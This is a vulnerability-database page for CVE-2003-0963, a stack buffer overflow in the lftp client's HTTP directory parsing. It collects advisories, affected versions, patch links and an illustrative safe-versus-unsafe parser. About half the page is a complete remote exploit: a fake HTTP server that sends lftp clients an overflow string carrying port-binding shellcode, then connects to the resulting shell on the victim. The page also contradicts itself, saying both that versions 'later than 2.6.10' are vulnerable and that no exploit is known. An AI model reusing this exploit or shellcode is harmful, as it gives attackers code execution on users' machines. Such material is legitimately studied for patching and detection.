CVE-2003-0963
CVSS 7.5
Published: 2004-01-05 00:00:00
Revised: 2016-10-17 22:38:33

[Original] Buffer overflows in (1) try_netscape_proxy and (2) try_squid_eplf for lftp 2.6.9 and earlier allow remote HTTP servers to execute arbitrary code via long directory names that are processed by the ls or rels commands.


[CNNVD] lftp Try_Netscape_Proxy Remote Buffer Overflow Vulnerability (CNNVD-200401-026)

        
        lftp is a command-line FTP client that supports multiple platforms and multiple protocols (ftp, ftps, http, https, hftp and others).
        lftp does not correctly handle some directory information in content returned by a remote HTTP server. A remote attacker can exploit this flaw to trigger a buffer overflow and potentially execute arbitrary instructions on the system with the privileges of the lftp process.
        The problem lies in the try_netscape_proxy() function in src/HttpDir.cc. When lftp connects to a web server over HTTP or HTTPS and its "ls" or "rels" command is used to browse a specially prepared directory, insufficient buffer boundary checking means that crafted directory data can trigger a buffer overflow, and carefully constructed data may allow arbitrary instructions to be executed on the system with the privileges of the lftp process.
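The bug class described above, as an added example that is not lftp's own code: a constructed parser for one line of a proxy-style directory listing in the shape the exploit further down this page feeds to the client (name, weekday, month, day, time, year, size), showing the unbounded sscanf "%s" copy into a fixed stack buffer beside a bounded parser that rejects oversize fields. The field layout, buffer sizes and function names are assumptions.

```c
/* Constructed example, not lftp's source: the parsing pattern behind
 * CVE-2003-0963. One line of a proxy-style HTTP directory listing is
 * assumed to look like <name> <dow> <month> <day> <hh:mm:ss> <year> <size>.
 * The vulnerable parser copies each text field with an unbounded "%s"
 * into a fixed stack buffer; the hardened one bounds every copy and
 * rejects oversize fields instead of silently truncating them. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_CAP  64   /* assumed buffer sizes, not lftp's */
#define TOKEN_CAP 16

struct entry {
    char name[NAME_CAP];
    char month[TOKEN_CAP];
    int  day, year;
    long size;
};

/* Vulnerable pattern: "%s" has no width limit, so a server-supplied name
 * longer than NAME_CAP-1 bytes overruns name[] on the stack. Kept only
 * for comparison on well-formed input. */
int parse_listing_vulnerable(const char *line, struct entry *e)
{
    char name[NAME_CAP], dow[TOKEN_CAP], month[TOKEN_CAP], tod[TOKEN_CAP];
    if (sscanf(line, "%s %s %s %d %s %d %ld",
               name, dow, month, &e->day, tod, &e->year, &e->size) != 7)
        return -1;
    strcpy(e->name, name);
    strcpy(e->month, month);
    return 0;
}

/* Copy the next whitespace-delimited token into dst (capacity cap). Returns
 * a pointer past the token, or NULL if it is empty or would not fit: an
 * over-long field is an error, not a truncation ("%63s" would only hide it). */
static const char *take_token(const char *p, char *dst, size_t cap)
{
    size_t n;
    p += strspn(p, " \t");
    n = strcspn(p, " \t\r\n");
    if (n == 0 || n >= cap) return NULL;
    memcpy(dst, p, n);
    dst[n] = '\0';
    return p + n;
}

/* Parse a decimal field; NULL when no digits are present. */
static const char *take_long(const char *p, long *out)
{
    char *end;
    p += strspn(p, " \t");
    *out = strtol(p, &end, 10);
    return end == p ? NULL : end;
}

/* Hardened parser: every copy is bounded and every field is validated. */
int parse_listing_safe(const char *line, struct entry *e)
{
    char dow[TOKEN_CAP], tod[TOKEN_CAP];
    long day, year;
    const char *p = line;
    if (!(p = take_token(p, e->name, sizeof e->name)))    return -1;
    if (!(p = take_token(p, dow, sizeof dow)))            return -1;
    if (!(p = take_token(p, e->month, sizeof e->month)))  return -1;
    if (!(p = take_long(p, &day)) || day < 1 || day > 31) return -1;
    if (!(p = take_token(p, tod, sizeof tod)))            return -1;
    if (!(p = take_long(p, &year)) || year < 1970)        return -1;
    if (!(p = take_long(p, &e->size)) || e->size < 0)     return -1;
    e->day = (int)day;
    e->year = (int)year;
    return 0;
}
```

Both parsers agree on a well-formed line; only the hardened one survives a 300-byte name, returning -1 instead of corrupting the stack.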
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:alexander_v._lukyanov:lftp:2.6.9
cpe:/a:alexander_v._lukyanov:lftp:2.3
cpe:/a:alexander_v._lukyanov:lftp:2.6.8
cpe:/a:alexander_v._lukyanov:lftp:2.6.5
cpe:/a:alexander_v._lukyanov:lftp:2.4.9
cpe:/a:alexander_v._lukyanov:lftp:2.6.7
cpe:/a:alexander_v._lukyanov:lftp:2.6.4
cpe:/a:alexander_v._lukyanov:lftp:2.5.2
cpe:/a:alexander_v._lukyanov:lftp:2.6.6
cpe:/a:alexander_v._lukyanov:lftp:2.6.3
cpe:/a:alexander_v._lukyanov:lftp:2.6.0

- OVAL (technical details for detection)

oval:org.mitre.oval:def:11180 Buffer overflows in (1) try_netscape_proxy and (2) try_squid_eplf for lftp 2.6.9 and earlier allow remote HTTP servers to execute arbitrary ...
*OVAL describes in detail how this vulnerability can be detected; see the corresponding OVAL definition for more technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0963
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0963
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200401-026
(official data source) CNNVD

- Other links and resources

ftp://patches.sgi.com/support/free/security/advisories/20040101-01-U
(UNKNOWN)  SGI  20040101-01-U
ftp://patches.sgi.com/support/free/security/advisories/20040202-01-U.asc
(UNKNOWN)  SGI  20040202-01-U
http://marc.info/?l=bugtraq&m=107126386226196&w=2
(UNKNOWN)  BUGTRAQ  20031212 [slackware-security] lftp security update (SSA:2003-346-01)
http://marc.info/?l=bugtraq&m=107152267121513&w=2
(UNKNOWN)  BUGTRAQ  20031213 lftp buffer overflows
http://marc.info/?l=bugtraq&m=107167974714484&w=2
(UNKNOWN)  BUGTRAQ  20031217 [OpenPKG-SA-2003.053] OpenPKG Security Advisory (lftp)
http://marc.info/?l=bugtraq&m=107177409418121&w=2
(UNKNOWN)  BUGTRAQ  20031218 GLSA: lftp (200312-07)
http://marc.info/?l=bugtraq&m=107340499504411&w=2
(UNKNOWN)  CONECTIVA  CLA-2004:800
http://www.debian.org/security/2004/dsa-406
(UNKNOWN)  DEBIAN  DSA-406
http://www.mandriva.com/security/advisories?name=MDKSA-2003:116
(UNKNOWN)  MANDRAKE  MDKSA-2003:116
http://www.novell.com/linux/security/advisories/2003_051_lftp.html
(UNKNOWN)  SUSE  SuSE-SA:2003:051
http://www.redhat.com/support/errata/RHSA-2003-403.html
(UNKNOWN)  REDHAT  RHSA-2003:403
http://www.redhat.com/support/errata/RHSA-2003-404.html
(UNKNOWN)  REDHAT  RHSA-2003:404

- Vulnerability information

lftp Try_Netscape_Proxy Remote Buffer Overflow Vulnerability
High risk  Boundary condition error
2004-01-05 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        MandrakeSoft
        ------------
        MandrakeSoft has released a security advisory (MDKSA-2003:116) and corresponding patches for this issue:
        MDKSA-2003:116: Updated lftp packages fix buffer overflow vulnerability
        Link:
        http://www.linux-mandrake.com/en/security/2003/2003-116.php

        Patch download:
        Updated Packages:
        Corporate Server 2.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/lftp-2.6.0-1.1.C21mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/lftp-2.6.0-1.1.C21mdk.src.rpm
        Corporate Server 2.1/x86_64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/RPMS/lftp-2.6.0-1.1.C21mdk.x86_64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/SRPMS/lftp-2.6.0-1.1.C21mdk.src.rpm
        Mandrake Linux 9.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.0/RPMS/lftp-2.6.0-1.1.90mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.0/SRPMS/lftp-2.6.0-1.1.90mdk.src.rpm
        Mandrake Linux 9.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.1/RPMS/lftp-2.6.4-2.1.91mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.1/SRPMS/lftp-2.6.4-2.1.91mdk.src.rpm
        Mandrake Linux 9.1/PPC:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/9.1/RPMS/lftp-2.6.4-2.1.91mdk.ppc.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/9.1/SRPMS/lftp-2.6.4-2.1.91mdk.src.rpm
        Mandrake Linux 9.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/lftp-2.6.6-2.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/SRPMS/lftp-2.6.6-2.1.92mdk.src.rpm
        Mandrake Linux 9.2/AMD64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/lftp-2.6.6-2.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/SRPMS/lftp-2.6.6-2.1.92mdk.src.rpm
        _______________________________________________________________________
        To upgrade automatically use MandrakeUpdate or urpmi. The verification
        of md5 checksums and GPG signatures is performed automatically for you.
        A list of FTP mirrors can be obtained from:
        
        http://www.mandrakesecure.net/en/ftp.php

        The update packages above can also be downloaded from any of the mirror FTP servers listed at:
        
        http://www.mandrakesecure.net/en/ftp.php

        RedHat
        ------
        RedHat has released a security advisory (RHSA-2003:403-01) and corresponding patches for this issue:
        RHSA-2003:403-01: Updated lftp packages fix security vulnerability
        Link: https://www.redhat.com/support/errata/RHSA-2003-403.html
        Patch download:
        Alexander V. Lukyanov lftp 2.4.9:
        RedHat Patch lftp-2.4.9-2.i386.rpm
        ftp://updates.redhat.com/7.2/en/os/i386/lftp-2.4.9-2.i386.rpm
        RedHat Patch lftp-2.4.9-2.ia64.rpm
        ftp://updates.redhat.com/7.2/en/os/ia64/lftp-2.4.9-2.ia64.rpm
        RedHat Patch lftp-2.4.9-2.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/lftp-2.4.9-2.i386.rpm
        Alexander V. Lukyanov lftp 2.5.2:
        RedHat Patch lftp-2.5.2-6.i386.rpm
        ftp://updates.redhat.com/8.0/en/os/i386/lftp-2.5.2-6.i386.rpm
        Alexander V. Lukyanov lftp 2.6.3:
        RedHat Patch lftp-2.6.3-4.i386.rpm
        ftp://updates.redhat.com/9/en/os/i386/lftp-2.6.3-4.i386.rpm
        Alexander V. Lukyanov lftp 2.6.5:
        Fedora Upgrade lftp-2.6.10-1.i386.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386/lftp-2.6.10-1.i386.rpm

        Fedora Upgrade lftp-debuginfo-2.6.10-1.i386.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386/debug/lftp-debuginfo-2.6.10-1.i386.rpm

        Alexander V. Lukyanov
        ---------------------
        lftp 2.6.10 fixes this vulnerability:
        
        http://lftp.yar.ru/get.html

        A patch for version 2.6.9 is also available from:
        
        http://labben.abm.uu.se/~ulha9485/lftp-advisory-data.tar.gz

- Vulnerability information (143)

lftp <= 2.6.9 Remote Stack based Overflow Exploit (EDBID:143)
linux remote
2004-01-14 Verified
0 Li0n7
/*
 * lftp remote stack-based overflow exploit by Li0n7 voila fr
 *
 * Vulnerability discovered by Ulf Harnhammar Ulf.Harnhammar.9485 student uu se
 *
 * Lftp versions later than 2.6.10 are prone to a remotely exploitable stack-based
 * overflow in try_netscape_proxy() and try_squid_eplf() (src/HttpDir.cc). This
 * bad coded proof-of-concept demonstrates the exploitation by exploiting the
 * vulnerable function try_netscape_proxy() (HttpDir.cc:358) and it needs more targets
 * to be efficient. Please note that this vulnerability is really hard to exploit
 * since lots of parameters come into play and are different from a platform to another,
 * for we have to overwrite some variables and registers before overwriting eip.
 * With some time and lot of patience, you should find your own parameters by using
 * GDB. Params to edit are marked with a '!' in the POC code. Moreover, I have edited
 * Bighawk's port binding shellcode not to contain any white character such as \r,\t,\v,
 * \f,\n or \20 because we are exploiting a sscanf function.
 *
 * usage: ./lftp-exp [-f <path>][-p <port>][-r <ret>][-t <target>]
 * -f <path>: create <path>index.html
 * -p <port>: run a fake lftp server on port <port> (default: 80)
 * -r <ret>: return address you would like to use
 * -t <target>: choose the target among the platforms available
 * Platforms supported are:
 * num: 0 - slack 9.0 - 0xbffff770
 *
 * For instance: ./lftp-exp -p 80 -t 0
 * ./lftp-exp -f / -t 0
 *
 * A poil !
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>

#define BUFFERSIZE 117 /*!*/
#define SIZE 256

#define D_BACK 26112
#define D_RET 0xbffff770
#define D_PORT 80

#define DUMMY1 0xbffff140 /*!*/
#define DUMMY2 0xbffff810 /*!*/

#define OK "cd ok, cwd=/\n"


/* Edited bighawk 78 bytes portbinding shellcode */
/* size: 80 bytes */
/* Does not contain any white character i.e \r,\t,\v,\f,\n,\20 */

char shellcode[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
"\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1"
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89"
"\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\xb0\x28\x2c\x1d\xcd\x80";

char badc0ded[] =
{0x20,0x09,0x0a,0x0b,0x0c,0x0d,0x00};

char *lftp_versions[] =
{
  "lftp/2.3",
  "lftp/2.4.9",
  "lftp/2.5.2",
  "lftp/2.6.0",
  "lftp/2.6.3",
  "lftp/2.6.4",
  "lftp/2.6.5",
  "lftp/2.6.6",
  "lftp/2.6.7",
  "lftp/2.6.8",
  "lftp/2.6.9",
   
};

unsigned long ret_addr = D_RET;

int back_connection(long host);
int check_shellcode(char *host);
void check_version(char *version);
char * build(char *host);
int create_file(char *path);
void wait_connection(int port);
long resolve_host(u_char *host_name);
void die(char *argv);

struct os_ret_addr
{
  int num;
  char *plat;
  long ret;
};

struct os_ret_addr exp_os[]=
{
  {0,"slack 9.0",0xbffff770},
  {0,NULL,0}
};


int
main(int argc,char *argv[])
{
  int i, option, port = D_PORT;
  long host = 0;
  char * option_list = "f:p:r:t:", path[128];

  opterr = 0;

  if (argc < 2) die(argv[0]);
  while((option = getopt(argc,argv,option_list)) != -1)
    switch(option)
    {
      case 'f':
      strncpy(path,optarg,sizeof(path)-1);
      path[sizeof(path)-1] = '\0';
      create_file(path);
      return 0;
      case 'p':
      port = atoi(optarg);
      if(port > 65535 || port < 0) exit(-1);
      break;
      case 'r':
      ret_addr = strtoul(optarg,NULL,0); /* accepts 0x... hex as well as decimal */
      if(ret_addr > 0xbfffffff) exit(1);
      break;
      case 't':
      for(i=0; exp_os[i].plat != NULL; i++) {} /* count the known platforms */
      if(atoi(optarg) >= i || atoi(optarg) < 0)
      {
        fprintf(stderr," Platforms supported are:\n");
        for(i=0; exp_os[i].plat != NULL; i++)
          fprintf(stderr," num: %i - %s - 0x%lx\n",i,exp_os[i].plat,exp_os[i].ret);
        exit(1);
      }
      ret_addr = exp_os[atoi(optarg)].ret;
      break;
      case '?':
      fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
      die(argv[0]);
    }
 
  wait_connection(port);
  return 0;
}


int
check_shellcode(char *host)
{
  int i,j;
  for(i=0;i<strlen(shellcode);i++)
    for(j=0;j<strlen(badc0ded);j++)
      if(shellcode[i] == badc0ded[j])
      {
      fprintf(stderr,"[%s] badc0ded shellcode!\n",host);
      return -1;
      }
  return 0;
}


void
check_version(char *version)
{
  int i;
  for(i=0;i<sizeof(lftp_versions)/sizeof(lftp_versions[0]);i++) /* element count, not byte count */
    if(!strcmp(lftp_versions[i],version))
    {
      fprintf(stdout,"(vulnerable).\n");
      return;
    }
  fprintf(stdout,"(not vulnerable).\n");
  return;
}


char
*build(char *host)
{
  char *buffer,*ptr;
  int i;
  unsigned long *addr_ptr;

  fprintf(stdout,"[%s] Building evil string to send (using ret 0x%lx)...\n",host,ret_addr);

  buffer = (char *)malloc(SIZE+1);

  if(!buffer)
  {
    fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
    exit(1);
  }

  ptr = buffer;
  memset(ptr,0x90,BUFFERSIZE-strlen(shellcode));
  ptr += BUFFERSIZE-strlen(shellcode);

  if((i = check_shellcode(host)) < 0) exit(1);

  for(i=0;i<strlen(shellcode);i++)
    *ptr++ = shellcode[i];

  /* You might need to modify the padding too */
  addr_ptr = (unsigned long *)ptr;
  for(i=0;i<24;i++)
   *(addr_ptr++) = DUMMY1;
  for(i=0;i<8;i++)
   *(addr_ptr++) = DUMMY2;
  *(addr_ptr++) = ret_addr; /* EIP */
  *(addr_ptr++) = DUMMY2;

  ptr = (char *)addr_ptr;
  *ptr = 0x0;
  return buffer;
}


int
create_file(char *path)
{
  int fd;
  char buffer[512], file[256];
  ssize_t written;

  memset(file,0,256);
  memset(buffer,0,512);

  strcat(file,path);
  strcat(file,"index.html");

  fd = open(file,O_WRONLY | O_CREAT | O_TRUNC,0644);
  if(fd < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(0);
  }
  snprintf(buffer,512,"<a href=\"/\">empty</a> Fri May 30 10:09:06 2001 %s\n",build("+"));
  written = write(fd,buffer,512);
  if(written != 512)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(0);
  }
  close(fd);
  fprintf(stdout,"[+] File %s successfuly created.\n",file);
  return 0;
}


int
back_connection(long host)
{
  struct sockaddr_in s;
  u_char sock_buf[4096];
  fd_set fds;
  int fd,size;
  char *command="/bin/uname -a ; /usr/bin/id;\n";

  fd = socket(AF_INET, SOCK_STREAM, 0);
  if (fd < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(1);
  }

  s.sin_family = AF_INET;
  s.sin_port = htons(D_BACK);
  s.sin_addr.s_addr = host;

  if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) == -1)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    close(fd);
    return 0;
  }

  fprintf(stdout, "[+] Let's rock on!\n");

  size = send(fd, command, strlen(command), 0);
  if(size < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    close(fd);
    exit(1);
  }

  for (;;)
  {
    FD_ZERO(&fds);
    FD_SET(0, &fds);
    FD_SET(fd, &fds);

    if (select(255, &fds, NULL, NULL, NULL) == -1)
    {
      fprintf(stderr,"[-] %s\n",strerror(errno));
      close(fd);
      exit(1);
    }

    memset(sock_buf, 0, sizeof(sock_buf));

    if (FD_ISSET(fd, &fds))
    {
      if (recv(fd, sock_buf, sizeof(sock_buf)-1, 0) <= 0) /* 0 means the peer closed */
      {
      fprintf(stderr, "[-] Connection closed by remote host,exiting...\n");
      close(fd);
      exit(1);
      }

      fprintf(stderr, "%s", sock_buf);
    }

    if (FD_ISSET(0, &fds))
    {
      read(0, sock_buf, sizeof(sock_buf));
      write(fd, sock_buf, strlen(sock_buf));
    }
  }
  return 0;
}


void
wait_connection(int port)
{
  struct sockaddr_in s;
  int size, fd, fd2, i, r, cancel = 0;
  char data[1024], version[32], request[512];
  char *ptr;
  long host = 0;

  memset(data,0,1024);

  fprintf(stdout,"[+] Setting up a fake HTTP server...\n");
 
  fd = socket(AF_INET,SOCK_STREAM,0);
  if(fd < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(1);
  }

  s.sin_family = AF_INET;
  s.sin_port = htons(port);
  s.sin_addr.s_addr = 0;

  if(bind(fd,(struct sockaddr *) &s,sizeof(s)) < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(1);
  }
  listen(fd,1);
  size = sizeof(s);
  
  fprintf(stdout,"[+] Awaiting connection on port %i\n",port);

  while(1)
  {
    cancel = 0;
    fd2 = accept(fd,(struct sockaddr *) &s, (socklen_t *)&size);

    if(!fork())
    {
      close(fd);
      while(1)
      {
      memset(data,0,1024);
      r = read(fd2,data,sizeof(data)-1);
      if(r <= 0) /* client went away or read failed: this child is done */
      {
        close(fd2);
        exit(0);
      }
      if((ptr = strstr(data,"User-Agent: lftp")) != NULL)
      {
        if(strstr(data,"HEAD"))
        {
          fprintf(stdout,"[%s] HEAD request received.\n",inet_ntoa(s.sin_addr));
          size = send(fd2, OK, strlen(OK), 0);
          if(size < 0)
          {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd2);
          exit(1);
          }
        }
        if(strstr(data,"GET"))
        {
          memset(request,0,512);
          memset(version,0,32);

          strncpy(version,ptr+12,10);
          version[sizeof(version)-1] = '\0';

          fprintf(stdout,"[%s] GET request received.\n",inet_ntoa(s.sin_addr));
          fprintf(stdout,"[%s] Remote version of lftp: %s ",inet_ntoa(s.sin_addr),version);
          check_version(version);

          snprintf(request,512,"HTTP/1.1 200 OK\n"
                 "Server: thttpd/2.21 20apr2001\n"
                 "Content-Type: text/html\n"
                 "Date: Sun, 21 Dec 2003 16:29:44 GMT\n"
                 "Last-Modified: Sun, 21 Dec 2003 16:23:41 GMT\n"
                 "Accept-Ranges: bytes\n"
                 "Connection: close\n\n"
                 "<a href=\"/\">empty</a>\tFri May 30 10:09:06 2001 %s\n",build((char*)inet_ntoa(s.sin_addr)));

          size = send(fd2, request, strlen(request), 0);
          if(size < 0)
          {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd2);
          exit(1);
          }
          sleep(2);
          host = resolve_host((char *)inet_ntoa(s.sin_addr));
          back_connection(host);
          cancel = 1;
          break;
        }
      }
      }
      if(cancel == 1) break;
    }
    close(fd2);
  }
  return;
}


long resolve_host(u_char *host_name)
{
  struct in_addr addr;
  struct hostent *host_ent;

  addr.s_addr = inet_addr((char *)host_name);
  if (addr.s_addr == INADDR_NONE)
  {
    host_ent = gethostbyname((char *)host_name);
    if (!host_ent) return(0);
    memcpy((char *)&addr.s_addr, host_ent->h_addr_list[0], host_ent->h_length);
  }

  return(addr.s_addr);
}


void
die(char *argv)
{
  int i;
  fprintf(stdout,"\t Remote exploit for lftp < 2.6.10 by Li0n7 \n");
  fprintf(stdout,"\n usage: %s [-f <path>][-p <port>][-r <ret>][-t <target>]\n",argv);
  fprintf(stdout," -f <path>: create <path>index.html\n");
  fprintf(stdout," -p <port>: run a fake lftp server on port <port> (default: 80)\n");
  fprintf(stdout," -r <ret>: return address you would like to use\n");
  fprintf(stdout," -t <target>: choose the target among the platforms available\n");
  fprintf(stdout," Platforms supported are:\n");
  for(i=0; exp_os[i].plat != NULL; i++)
    fprintf(stderr," num: %i - %s - 0x%lx\n",i,exp_os[i].plat,exp_os[i].ret);
  fprintf(stdout,"\n Vulnerability discovered by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se> \n");
  fprintf(stdout," Contact me: Li0n7@voila.fr\n\n");
  exit(1);
}


// milw0rm.com [2004-01-14]

- Vulnerability information

3015
lftp HTTP Directory Name Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

A remote overflow exists in LFTP. The FTP Client fails to Check boundaries in incoming data resulting in a buffer overflow. With a specially crafted request, an attacker can cause compromise of a user's system resulting in a loss of control.

- Timeline

2003-12-12 2003-12-12
Unknown Unknown

- Solution

Upgrade to version 2.6.10 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Do not use the client.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

lftp Try_Squid_Eplf Buffer Overflow Vulnerability
Boundary Condition Error 9212
Yes No
2003-12-15 12:00:00 2009-07-12 12:56:00
Discovered by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>.

- Affected program versions

Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux -current
SGI ProPack 2.4
SGI ProPack 2.3
Alexander V. Lukyanov lftp 2.6.9
+ Conectiva Linux 9.0
+ Conectiva Linux 8.0
+ OpenPKG OpenPKG Current
Alexander V. Lukyanov lftp 2.6.8
Alexander V. Lukyanov lftp 2.6.7
Alexander V. Lukyanov lftp 2.6.6
+ Mandriva Linux Mandrake 9.2
+ OpenPKG OpenPKG 1.3
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Alexander V. Lukyanov lftp 2.6.5
+ Red Hat Fedora Core1
Alexander V. Lukyanov lftp 2.6.4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ OpenPKG OpenPKG 1.2
Alexander V. Lukyanov lftp 2.6.3
+ Red Hat Enterprise Linux AS 3
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ RedHat Linux 9.0 i386
Alexander V. Lukyanov lftp 2.6.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
Alexander V. Lukyanov lftp 2.5.2
+ RedHat Linux 8.0 i386
Alexander V. Lukyanov lftp 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
Alexander V. Lukyanov lftp 2.3
Alexander V. Lukyanov lftp 2.6.10

- Unaffected program versions

Alexander V. Lukyanov lftp 2.6.10

- Vulnerability discussion

It has been reported that the lftp file transfer client is vulnerable to a remotely exploitable buffer overflow condition. The vulnerability is present when lftp is used to retrieve content from a remote HTTP server. According to the report, the client does not properly handle special directories that exist on the server. These failures can be exploited by operators of web servers to execute arbitrary instructions on the host running lftp. Any such code would run with the privileges of the user who invoked lftp.

** This BID, originally entitled "lftp Buffer Overflow Vulnerabilities", has been divided into two distinct issues. BID 9210 has also been revised to cover one of the issues described in the initial version of this BID.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

The vulnerability is fixed in version 2.6.10:

http://lftp.yar.ru/get.html

A patch that applies to 2.6.9 is also available:

http://labben.abm.uu.se/~ulha9485/lftp-advisory-data.tar.gz

OpenPKG has released an advisory (OpenPKG-SA-2003.053) with fixes to address these issues. Please see the referenced advisory for further information. Fixes are linked below.

SuSE has released an advisory with fixes to address these issues. Please see the referenced advisory for more information.

RedHat has released fixes for the Fedora project. Users are advised to download the fixed packages.

Mandrake has released advisory MDKSA-2003:116 with fixes to address this issue.

Red Hat has released security advisory RHSA-2003:403-01 to address this issue. Additionally, Red Hat has released advisory RHSA-2003:404-08 to address this issue in affected Enterprise operating systems. Users are advised to run up2date to resolve this issue.

Gentoo has released advisory 200312-07 to address this issue. Affected users are advised to execute the following commands:

emerge sync
emerge -pv '>=net-ftp/lftp-2.6.10'
emerge '>=net-ftp/lftp-2.6.10'
emerge clean

Slackware have released an advisory (SSA:2003-346-01) and fixes to address this issue.

Debian has released advisory DSA 406-1 to address this issue.

Conectiva has released advisory CLA-2004:800 to address this issue.

SGI has released SGI Advanced Linux Environment security update #8 (20040101-01-U) to provide fixes for this issue. Please see the attached advisory for more details.

TurboLinux has released advisory TLSA-2004-2 to address this issue. Please see the reference section for more details.

SGI has released an advisory 20040202-01-U to address this and other issues in SGI ProPack 2.4. Please see the referenced advisory for more information. Fixes are available below:


Slackware Linux -current
SGI ProPack 2.3
SGI ProPack 2.4
Alexander V. Lukyanov lftp 2.4.9
Alexander V. Lukyanov lftp 2.5.2
Alexander V. Lukyanov lftp 2.6.0
Alexander V. Lukyanov lftp 2.6.3
Alexander V. Lukyanov lftp 2.6.4
Alexander V. Lukyanov lftp 2.6.5
Alexander V. Lukyanov lftp 2.6.6
Alexander V. Lukyanov lftp 2.6.9
Slackware Linux 8.1
Slackware Linux 9.0
Slackware Linux 9.1

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.